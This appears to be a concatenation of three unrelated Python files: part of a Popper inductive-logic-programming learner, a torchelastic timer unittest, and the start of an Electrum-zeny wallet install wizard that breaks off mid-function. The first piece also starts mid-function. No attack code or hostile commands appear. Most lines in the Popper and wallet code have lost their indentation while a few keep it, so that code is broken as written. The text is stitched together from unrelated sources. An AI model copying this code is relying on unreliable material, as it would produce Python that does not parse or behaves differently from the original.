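    import collections
    FakeRule = collections.namedtuple('FakeRule', 'body')
    program = [FakeRule(body=(1, 2, 3))]        # 3 body literals + 1 head = 4
    conf_matrix = (5, 1, 5, 0)                  # (tp, fn, tn, fp) -> 1 error
    assert mdl(program, conf_matrix) == 4 + 10  # 14
    return mdl(program, conf_matrix)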
def chunks(xs, size):
# SHUFFLE?
for i in range(0, len(xs), size):
yield xs[i:i+size]
def load_examples(settings):
pos = []
neg = []
with open(settings.ex_file) as f:
for line in f:
line = line.strip()
if line.startswith('pos'):
line = line[4:-2]
pos.append(line)
elif line.startswith('neg'):
line = line[4:-2]
neg.append(line)
return (pos, neg)
# TODO: replace with a cleaner reduce-based implementation.
def intersection(xs):
    if not xs:
        return set()
    ys = set(xs[0])
    for x in xs[1:]:
        ys.intersection_update(x)
    return ys
def hash_union(tester, progs):
union_hashes = set()
union = set()
for prog in progs:
for rule in prog:
k = rule.my_hash()
if k not in union_hashes:
union_hashes.add(k)
union.add(rule)
if tester.check_redundant_clause(union):
union = tester.reduce_program(union)
return frozenset(union)
def union_of_seen(tester, last_ex_prog, pos):
return hash_union(tester, (last_ex_prog[ex] for ex in pos))
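# check whether a program learned earlier in this iteration already covers the current chunk;
# if so, reuse it, otherwise derive specialisation/redundancy constraints from its outcome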
def check_old_programs(constrainer, grounder, iteration_progs, min_chunk_prog_size, max_chunk_prog_size, tester, chunk_exs, inc_rules, gen_rules, spec_rules, redundancy_rules):
chunk_prog = None
# TODO: ORDER ITERATION_PROGS BY SIZE
# hist_redundancy = set()
# hist_specialisation = set()
new_rules = set()
for prog in iteration_progs:
k = num_literals(prog)
if k >= min_chunk_prog_size and k < max_chunk_prog_size:
(outcome, _conf_matrix) = tester.test(prog, chunk_exs, [])
(pos_outcome, _neg_outcome) = outcome
dbg(f'\t<OLD PROGRAM {k}>')
for clause in prog:
dbg('\t',clause.to_code())
dbg('\t' + str(pos_outcome))
dbg(f'\t</OLD PROGRAM {k}>')
if pos_outcome == Outcome.ALL:
# QUESTION: IF WE FIND AN EXISTING PROGRAM THAT WORKS, IS THERE ANY POINT LEARNING ANOTHER ONE, EVEN IF THE NEW ONE IS SMALLER?
# QUESTION: IF WE FIND AN EXISTING PROGRAM THAT WORKS, IS THERE ANY POINT LEARNING A SPECIALISATION OF IT?
# QUESTION: IF WE FIND AN EXISTING PROGRAM THAT WORKS, IS THERE ANY POINT LEARNING A SUBSET OF IT?
if DEBUG:
dbg(f'\treusing solution of size {k}')
max_chunk_prog_size = k
chunk_prog = prog
# for x in constrainer.specialisation_constraint(Program(prog)):
# new_rules.add(x)
elif pos_outcome == Outcome.NONE:
for x in constrainer.redundancy_constraint(Program(prog)):
new_rules.add(x)
elif pos_outcome == Outcome.SOME:
for x in constrainer.specialisation_constraint(Program(prog)):
new_rules.add(x)
new_inc_rules = set()
new_spec_rules = set()
new_redundacy_rules = set()
for (rule_type, rule) in new_rules:
for ground_rule in set(ground_rules(grounder, grounder.max_clauses, grounder.max_vars, [rule])):
if rule_type == 'INCLUSION':
new_inc_rules.add(ground_rule)
elif rule_type == Con.SPECIALISATION:
new_spec_rules.add(ground_rule)
elif rule_type == Con.REDUNDANCY:
new_redundacy_rules.add(ground_rule)
inc_rules.update(new_inc_rules)
    for ex in chunk_exs:
        spec_rules[ex].update(new_spec_rules)
        redundancy_rules[ex].update(new_redundacy_rules)
return (chunk_prog, max_chunk_prog_size)
def process_chunk(stats, settings, tester, constrainer, grounder, neg, inc_rules, gen_rules, spec_rules, redundancy_rules, iteration_progs, num_chunks, chunk_num, chunk_exs, last_ex_prog, min_prog_size, best_prog_size):
chunk_prog = None
dbg(f'chunk {chunk_num+1}/{num_chunks} - num examples: {len(chunk_exs)}')
# dbg(chunk_exs)
if all(last_ex_prog[x] != None for x in chunk_exs):
# with stats.duration('hash_union'):
chunk_prog = union_of_seen(tester, last_ex_prog, chunk_exs)
if DEBUG:
dbg('\t<best so far>')
for clause in chunk_prog:
dbg('\t' + clause.to_code())
dbg('\t</best so far>')
# min size for this chunk is the maximum size of the solutions for the smaller chunks
min_chunk_prog_size = max(min_prog_size[ex] for ex in chunk_exs)
# max size for this chunk is the size of the union of the solutions for the smaller chunks
max_chunk_prog_size = best_prog_size
if chunk_prog != None:
k = num_literals(chunk_prog)
if k < best_prog_size:
max_chunk_prog_size = k
improvement_possible = min_chunk_prog_size < max_chunk_prog_size
# if we cannot learn something smaller, then this chunk program is the union of all the solutions for the smaller chunks
if not improvement_possible:
if DEBUG:
dbg(f'\t skipping as min_chunk_prog_size ({min_chunk_prog_size}) >= max_chunk_prog_size ({max_chunk_prog_size})')
# chunk_prog = union_of_seen(tester, last_ex_prog, chunk_exs)
# for ex in chunk_exs:
# last_ex_prog[ex] = chunk_prog
if improvement_possible and settings.lazy:
with stats.duration('check_old_programs'):
# check whether any previous solution in this iteration covers this chunk.
(better_older_prog, max_chunk_prog_size) = check_old_programs(constrainer, grounder, iteration_progs, min_chunk_prog_size, max_chunk_prog_size, tester, chunk_exs, inc_rules, gen_rules, spec_rules, redundancy_rules)
if better_older_prog != None:
chunk_prog = better_older_prog
# if we can reuse one, then update the best solution for the examples
# for ex in chunk_exs:
# last_ex_prog[ex] = chunk_prog
# also update when an improvement is possible
improvement_possible = min_chunk_prog_size < max_chunk_prog_size
if settings.lazy:
improvement_possible = False
# TODO: IF WE KNOW SOMETHING IS COMPLETE, CAN WE RULE OUT SPECIALISATIONS?????
# TODO: ELIMINATE THE PREVIOUS H FROM THE SEARCH SPACE???
# build constraints for this chunk
# specialisation rules are example dependent
chunk_specialisation_rules = set(rule for ex in chunk_exs for rule in spec_rules[ex])
# redundancy rules only apply if they hold for all examples
chunk_redundancy_rules = intersection(list(redundancy_rules[ex] for ex in chunk_exs))
new_solution = None
if improvement_possible:
max_chunk_prog_size -= 1
# call popper with the chunk examples and chunk constraints
# receive the hypothesis, constraints, and conf_matrix for this chunk
if DEBUG:
dbg(f'\tchunk_search min:{min_chunk_prog_size} max:{max_chunk_prog_size}')
# (new_solution, new_gen_rules, new_spec_rules, new_redundacy_rules) = popper(settings, constrainer, tester, chunk_exs, neg, gen_rules, chunk_specialisation_rules, chunk_redundancy_rules, 0, max_chunk_prog_size)
(new_solution, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules) = popper(settings, stats, constrainer, grounder, tester, chunk_exs, neg, inc_rules, gen_rules, chunk_specialisation_rules, chunk_redundancy_rules, min_chunk_prog_size, max_chunk_prog_size)
# if new_solution == None:
# print('FAIL'*10)
# print(chunk_exs)
# TODO: ADD EARLY PRUNING!!!???
if new_solution != None:
chunk_prog = frozenset(new_solution)
# update the inclusion rules
inc_rules.update(new_inc_rules)
# update the generalisation rules
gen_rules.update(new_gen_rules)
# update the specialisation and redundancy rules for each example
for ex in chunk_exs:
spec_rules[ex].update(new_spec_rules)
redundancy_rules[ex].update(new_redundacy_rules)
# TODO: IF WE SEARCH DEPTH K FOR A SOLUTION FOR A SPECIFIC EXAMPLE AND WE DO NOT FIND ONE, THEN THERE IS NO POINT SEARCH TO DEPTH K AGAIN
# AC: WHAT ABOUT THE PREVIOUS ITERATION PROG
# if there is a hypothesis, add it to the iteration hypothesis
if new_solution == None:
if DEBUG and chunk_prog != None:
dbg(f'\told program:')
for clause in chunk_prog:
dbg('\t' + clause.to_code())
else:
# AC: CHECK IF NEEDED
# chunk_prog = frozenset(chunk_prog)
if DEBUG and chunk_prog != None:
dbg(f'\tNEW PROGRAM:')
for clause in chunk_prog:
dbg('\t' + clause.to_code())
# remove redundant clauses
with stats.duration('check_redundant_clause'):
if chunk_prog:
if tester.check_redundant_clause(chunk_prog):
chunk_prog = frozenset(tester.reduce_program(chunk_prog))
return chunk_prog
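# baseline: run a single Popper search over all of the examples at once (no chunking)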
def standard_popper(settings, stats, queue):
(pos, neg) = load_examples(settings)
constrainer = Constrain(settings)
tester = Tester(settings, pos, neg)
grounder = Clingo(settings.bias_file, settings.clingo_args)
(new_solution, _new_inc_rules, _new_gen_rules, _new_spec_rules, _new_redundacy_rules) = popper(settings, stats, constrainer, grounder, tester, pos, neg, set(), set(), set(), set(), MIN_SIZE, MAX_SIZE)
if new_solution != None:
queue['prog'] = new_solution
for x in new_solution:
dbg('\t'+ x.to_code())
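# split the positive examples into chunks, learn a program per chunk, and take the union of the
# chunk programs; the chunk size doubles each iteration until it covers all the examples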
def split_search(settings, stats, queue):
min_size, max_size = MIN_SIZE, MAX_SIZE
# best hypothesis and score seen so far
best_prog, best_prog_size, best_prog_errors = None, max_size, None
(pos, neg) = load_examples(settings)
random.shuffle(pos)
random.shuffle(neg)
constrainer = Constrain(settings)
tester = Tester(settings, pos, neg)
grounder = Clingo(settings.bias_file, settings.clingo_args)
# minimum size of program needed to cover each example
min_prog_size = {x:min_size for x in pos}
# the latest program that covers an example
last_ex_prog = {x:None for x in pos}
# all inclusion rules
inc_rules = set()
# all generalisation rules
gen_rules = set()
# specialisation rules for each example
spec_rules = {x:set() for x in pos}
# redundancy rules for each example
redundancy_rules = {x:set() for x in pos}
# size of the chunks/partitions of the examples
chunk_size = 1
# the initial partitions where each example has its own partition
all_chunks = [[x] for x in pos]
while True:
dbg('CHUNK_SIZE', chunk_size)
# AC: WE COULD MOVE THIS UP AND IT MIGHT SAVE US TIME!!!
iteration_progs = set()
# partition the positive examples in chunks of size chunk_size
these_chunks = list(chunks(all_chunks, chunk_size))
num_chunks = len(these_chunks)
for i, chunk_exs in enumerate(these_chunks):
# flatten the chunks
chunk_exs = [item for sublist in chunk_exs for item in sublist]
chunk_prog = process_chunk(stats, settings, tester, constrainer, grounder, neg, inc_rules, gen_rules, spec_rules, redundancy_rules, iteration_progs, num_chunks, i, chunk_exs, last_ex_prog, min_prog_size, best_prog_size)
if chunk_prog:
size = num_literals(chunk_prog)
for ex in chunk_exs:
min_prog_size[ex] = size
last_ex_prog[ex] = chunk_prog
iteration_progs.add(chunk_prog)
# build up the best_prog when best_prog == None
if best_prog == None:
queue['prog'] = hash_union(tester, iteration_progs)
# program for this chunk size is the union of the chunk progs
with stats.duration('hash_union'):
iteration_prog = hash_union(tester, iteration_progs)
iteration_prog_size = num_literals(iteration_prog)
        # experimental: test each smaller iteration program on all the positive examples;
        # if one of them already covers every positive example, prefer it over the union
for prog in iteration_progs:
k = num_literals(prog)
if k < iteration_prog_size:
(outcome, _conf_matrix) = tester.test(prog, pos, [])
(pos_outcome, _neg_outcome) = outcome
if pos_outcome == Outcome.ALL:
# print('WTF'*50)
iteration_prog = prog
iteration_prog_size = num_literals(prog)
for x in pos:
last_ex_prog[x] = iteration_prog
# AFTER GOING THROUGH ALL THE CHUNKS
if settings.chunking:
with stats.duration('chunking'):
tmp_chunks = {}
for ex in pos:
prog = last_ex_prog[ex]
if prog == None:
prog = frozenset()
if prog not in tmp_chunks:
tmp_chunks[prog] = set([ex])
else:
tmp_chunks[prog].add(ex)
new_chunk_pos = []
for k, v in tmp_chunks.items():
# print('CHUCKY')
# for x in k:
# dbg('\t'+ x.to_code())
new_chunk_pos.append(v)
# print('k',k)
# print('v',v)
all_chunks = new_chunk_pos
# NEW!!!!
# for chunk in all_chunks:
# _chunk_spec = set(rule for ex in chunk for rule in spec_rules[ex])
# _chunk_redundancy = intersection(list(redundancy_rules[ex] for ex in chunk))
# for ex in chunk:
# spec_rules[ex] = _chunk_spec
# redundancy_rules[ex] = _chunk_redundancy
# calculate the score of the hypothesis at this iteration against all examples
if iteration_prog_size == 0:
conf_matrix = (len(pos), 0, 0, (len(neg)))
else:
(_, conf_matrix) = tester.test(iteration_prog, pos, neg, test_all=True)
# iteration_prog_score = mdl(iteration_prog, conf_matrix)
(tp, fn, tn, fp) = conf_matrix
iteration_num_errors = fn + fp
if DEBUG:
dbg(f'CHUNK:{chunk_size} size:{iteration_prog_size} fn:{fn} fp:{fp}')
for clause in iteration_prog:
dbg('\t',clause.to_code())
if (best_prog is None) or (iteration_num_errors < best_prog_errors) or (iteration_num_errors == best_prog_errors and iteration_prog_size < best_prog_size):
best_prog = iteration_prog
best_prog_size = iteration_prog_size
best_prog_errors = iteration_num_errors
# queue.put(best_prog)
# queue[0] = best_prog
queue['prog'] = best_prog
dbg(f'BEST_PROG size:{best_prog_size} errors:{best_prog_errors}')
for x in best_prog:
dbg('\t'+ x.to_code())
if settings.optimistic and best_prog_errors == 0:
break
# if the chunk_size is >= the number of pos examples, stop
if chunk_size >= len(all_chunks):
break
# double the chunk size (so the loop runs for at most log(len(pos)) iterations)
chunk_size += chunk_size
# queue.put(best_prog)
dbg(f'best_prog size:{best_prog_size} errors:{best_prog_errors}')
if best_prog:
for x in best_prog:
dbg('\t'+ x.to_code())
return
from multiprocessing import Process, Queue
# def runner(settings):
# # queue = Queue()
# stats = Stats()
# if settings.baseline:
# p = multiprocessing.Process(target = standard_popper, args = (settings, stats, queue))
# else:
# p = multiprocessing.Process(target = split_search, args = (settings, stats, queue))
# p.start()
# p.join(int(settings.timeout))
# if p.is_alive():
# p.terminate()
# prog = None
# i=1
# while queue.empty() == False:
# prog = queue.get()
# print(i)
# if prog != None:
# for x in prog:
# dbg('\t'+ x.to_code())
# i+=1
# return prog
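# run the search in a separate process with a timeout; a Manager dict is used so the child can
# publish its best program so far and the parent can still read it after terminating the child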
def runner(settings):
with multiprocessing.Manager() as manager:
# l = manager.list(range(1))
l = manager.dict()
l['prog'] = None
stats = Stats()
if settings.baseline:
p = multiprocessing.Process(target = standard_popper, args = (settings, stats, l))
else:
p = multiprocessing.Process(target = split_search, args = (settings, stats, l))
p.start()
p.join(int(settings.timeout))
if p.is_alive():
p.terminate()
return l['prog']
if __name__ == '__main__':
settings = Settings()
runner(settings)
|
local_timer_example.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import logging
import multiprocessing as mp
import signal
import time
import unittest
import torch.multiprocessing as torch_mp
import torchelastic.timer as timer
from torchelastic.test.test_utils import is_asan_or_tsan, is_tsan
logging.basicConfig(
level=logging.INFO, format="[%(levelname)s] %(asctime)s %(module)s: %(message)s"
)
def _happy_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(0.5)
def _stuck_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(5)
class LocalTimerExample(unittest.TestCase):
"""
Demonstrates how to use LocalTimerServer and LocalTimerClient
to enforce expiration of code-blocks.
Since torch multiprocessing's ``start_process`` method currently
does not take the multiprocessing context as parameter argument
there is no way to create the mp.Queue in the correct
context BEFORE spawning child processes. Once the ``start_process``
API is changed in torch, then re-enable ``test_torch_mp_example``
unittest. As of now this will SIGSEGV.
"""
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_torch_mp_example(self):
# in practice set the max_interval to a larger value (e.g. 60 seconds)
mp_queue = mp.get_context("spawn").Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
# all processes should complete successfully
# since start_process does NOT take context as parameter argument yet
# this method WILL FAIL (hence the test is disabled)
torch_mp.spawn(
fn=_happy_function, args=(mp_queue,), nprocs=world_size, join=True
)
with self.assertRaises(Exception):
# torch.multiprocessing.spawn kills all sub-procs
# if one of them gets killed
torch_mp.spawn(
fn=_stuck_function, args=(mp_queue,), nprocs=world_size, join=True
)
server.stop()
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_spawn(self):
self._run_example_with(start_method="spawn")
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_forkserver(self):
self._run_example_with(start_method="forkserver")
@unittest.skipIf(is_tsan(), "test is tsan incompatible")
def test_example_start_method_fork(self):
self._run_example_with(start_method="fork")
def _run_example_with(self, start_method):
spawn_ctx = mp.get_context(start_method)
mp_queue = spawn_ctx.Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
processes = []
for i in range(0, world_size):
if i % 2 == 0:
p = spawn_ctx.Process(target=_stuck_function, args=(i, mp_queue))
else:
p = spawn_ctx.Process(target=_happy_function, args=(i, mp_queue))
p.start()
processes.append(p)
for i in range(0, world_size):
p = processes[i]
p.join()
if i % 2 == 0:
self.assertEqual(-signal.SIGKILL, p.exitcode)
else:
self.assertEqual(0, p.exitcode)
server.stop()
|
installwizard.py
|
import sys
import os
import threading
import traceback
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
import electrum_zeny
from electrum_zeny import Wallet, WalletStorage
from electrum_zeny.util import UserCancelled, InvalidPassword
from electrum_zeny.base_wizard import BaseWizard
from electrum_zeny.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
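# decorator for wizard pages: updates the Back/Cancel button, runs the wrapped dialog and passes
# its result to run_next; GoBack and UserCancelled unwind to the previous page or abort the page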
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-zeny - ' + _('Install Wizard'))
self.app = app
self.config = config
        # Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
        self.refresh_gui()  # needed to refresh the GUI under Qt on macOS
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-zeny wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
